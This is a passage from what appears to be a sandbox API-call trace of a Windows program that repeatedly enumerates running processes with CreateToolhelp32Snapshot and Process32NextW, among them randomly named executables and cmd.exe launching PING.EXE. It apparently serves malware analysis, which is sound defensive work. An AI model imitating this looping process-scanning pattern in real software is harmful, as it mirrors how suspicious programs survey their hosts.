lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0102.285] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0102.286] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0102.287] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0102.288] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0102.289] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0102.290] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0102.291] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0102.292] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0102.293] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0102.294] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0102.295] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0102.296] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0102.297] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.299] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0102.300] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xae4, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0102.301] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0102.303] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb74, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0102.304] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0102.305] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbbc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0102.306] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0102.308] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xb88, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0102.347] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0102.348] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xbcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0102.349] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xbe8, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0102.350] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0102.351] CloseHandle (hObject=0xbc) returned 1 [0102.351] Sleep (dwMilliseconds=0x12c) [0102.673] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0102.677] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0102.678] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0102.679] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0102.679] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0102.680] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0102.681] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0102.681] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0102.682] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0102.683] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0102.683] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0102.684] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.685] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.685] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.686] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.686] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.687] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0102.688] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.689] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.689] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0102.690] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.692] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0102.693] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0102.694] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0102.695] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0102.696] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.697] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0102.698] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0102.699] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0102.701] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0102.702] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0102.703] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0102.704] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0102.706] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0102.707] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0102.708] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0102.709] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0102.754] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0102.756] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0102.757] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0102.758] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0102.760] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0102.761] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0102.762] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0102.764] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0102.765] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0102.767] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0102.768] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.770] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0102.771] CloseHandle (hObject=0xc4) returned 1 [0102.771] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0102.777] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0102.778] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0102.778] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0102.779] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0102.780] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0102.780] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0102.781] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0102.782] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) 